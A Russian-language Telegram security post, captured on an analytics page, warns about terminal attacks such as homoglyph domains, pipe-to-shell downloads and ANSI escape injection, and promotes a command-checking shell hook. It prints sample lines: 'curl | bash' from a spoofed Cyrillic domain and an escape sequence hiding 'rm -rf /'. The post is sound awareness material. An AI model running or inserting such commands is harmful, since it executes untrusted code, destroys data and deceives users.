C
Chumikov Sec
@chumikovsec1.7K подп.
1.3Kпросмотров
74.4%от подписчиков
12 февраля 2026 г.
📷 ФотоScore: 1.4K
Привет, Заблокированные! 😁 Ну что, поговорим о чём-то серьёзном? Слышали о таких типах атак? 🗄Homograph attacks — фишинговые домены с похожими символами (кириллица вместо латиницы, punycode) 🗄 Terminal injection — ANSI-escape последовательности, переписывающие ваш экран 🗄 Pipe-to-shell — прямое выполнение скачанных скриптов (curl | bash) 🗄 Dotfile attacks — модификация ~/.bashrc, ~/.ssh/authorized_keys 🗄 Insecure transport — HTTP вместо HTTPS, отключенная проверка TLS 🗄 Ecosystem threats — typosquatting в git clone, недоверенные Docker registry 🗄 Credential exposure — учетные данные в URL, сокращенные ссылки Знаете, что их объединяет? Браузеры решили эти угрозы лет 10 назад — показывают предупреждения о смешанном контенте, блокируют homograph-атаки, предупреждают о небезопасных загрузках. А знаете где эти проблемы не решены совсем? Терминал! Он беззвучно рендерит Unicode, ANSI-коды и невидимые символы. Вы скачаете вредоносный скрипт раньше, чем заметите разницу. Ну как же без примеров? 😊 # Безопасно git clone https://github.com/example/tool # Опасно — 'о' это кириллица U+043E git clone https://github.cоm/example/tool # Безопасно curl -sSL https://raw.githubusercontent.com/user/repo/main/script.sh | bash # Опасно — 'a' это кириллица U+0430 curl -sSL https://rаw.githubusercontent.com/user/repo/main/script.sh | bash # ANSI injection — скрывает команду выводом echo "Downloading..." echo -e "\033[3A\033[Jrm -rf /" Поняли тему? В терминале эти механики прекрасно работают! Вспомните, сколько раз за последние 2 недели вы копировали что-то из сети и вставляли в терминал? Вот вот! Что делать? Tirith — shell-хук на Rust, который анализирует каждую команду перед выполнением. 30 правил, 7 категорий. Весь анализ локальный — никаких сетевых вызовов. Имхо - must have! Ну и репо можно поизучать на тему того, а что же он всё-таки фильтрует? Для общего развития ☺️ Перешлите пост своим друзьям и знакомым, ну и лайк мне за старания! PS Второй экран у Bjorn не заработал 😔 Буду дальше экспериментировать.... #tirith #cmd #terminal #vibecoding #vuln
1.3K
просмотров
2100
символов
Да
эмодзи
Да
медиа

Другие посты @chumikovsec

Всем привет! Вторая статья по Vibe Pentesting. В первой статье мы собрали себе инструментарий Open👁 3.7KВсем привет! Пятница, как и обещал! Заваривайте вечером что покрепче и пробуйте! 😄 https://habr.c👁 1.2KВсем привет! Всё гениальное - просто. Тут на TheHackerNews вышла статья, которая показывает развити👁 1.1KВсем привет! Тут Tor Project опубликовали финансовый отчет за 2023-2024 и я, если честно, охренел у👁 1.1KВсем привет! Тут интересный контент подогнали, да не от кого-нибудь, а от ФСТЭК. "В целях повышени👁 1.1K
Все посты канала →
Аналитика каналаБаза постов
Привет, Заблокированные! 😁 Ну что, поговорим о чём-то серьё — @chumikovsec | PostSniper